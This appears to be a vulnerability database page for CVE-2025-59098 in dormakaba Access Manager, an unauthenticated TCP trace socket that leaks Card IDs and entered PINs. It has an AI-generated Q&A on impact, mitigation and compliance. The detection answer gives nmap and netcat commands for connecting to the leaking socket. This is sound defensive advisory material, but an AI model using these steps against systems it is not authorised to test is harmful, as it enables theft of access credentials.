CVE-2025-59098
Unauthenticated TCP Trace Data Exposure in dormakaba Access Manager
Publication date: 2026-01-26
Last updated on: 2026-01-26
Assigner: SEC Consult Vulnerability Lab
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dormakaba | access_manager | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-497 | The product does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the product does. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability involves the Access Manager's trace functionality, which broadcasts debug information over a TCP socket without any authentication or encryption. An attacker with network access can connect to this socket and receive sensitive data, including Card IDs and all button presses on Registration units, such as entered PINs. The verbosity level of the transmitted data can be set via HTTP(S) or SOAP interfaces, potentially allowing attackers to increase the amount of sensitive information exposed.
How can this vulnerability impact me? :
The vulnerability can lead to unauthorized disclosure of sensitive information, such as Card IDs and PINs entered on Registration units. An attacker with network access can intercept this data, potentially leading to unauthorized access, identity theft, or other security breaches involving the affected devices.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by scanning the network for open TCP sockets associated with the Access Manager's trace functionality that broadcast debug information without authentication or encryption. You can use network scanning tools like nmap to identify open TCP ports related to the Access Manager device. For example, running a command such as 'nmap -sV -p <port> <target-ip>' can help detect the open trace socket. Additionally, using tools like netcat (nc) to connect to the suspected TCP socket (e.g., 'nc <target-ip> <port>') can verify if debug information is being broadcasted. Monitoring network traffic for unencrypted debug data containing sensitive information like Card IDs or button presses can also indicate the presence of this vulnerability.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting network access to the TCP socket used for the trace functionality to trusted administrators only, ideally by implementing network segmentation or firewall rules to block unauthorized access. Disabling the trace functionality if it is not required can prevent exposure. Additionally, changing or securing the service interface password and avoiding the use of guessable device identifiers can reduce the risk of unauthorized verbosity level changes. Since the socket lacks authentication and encryption, applying network-level protections is critical to prevent attackers from intercepting sensitive debug data.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability exposes sensitive data such as Card IDs and PIN entries without authentication or encryption, which could lead to unauthorized access to personal and security information. Such exposure likely violates data protection requirements in standards like GDPR and HIPAA that mandate safeguarding personal and sensitive information against unauthorized access and ensuring confidentiality and integrity of data.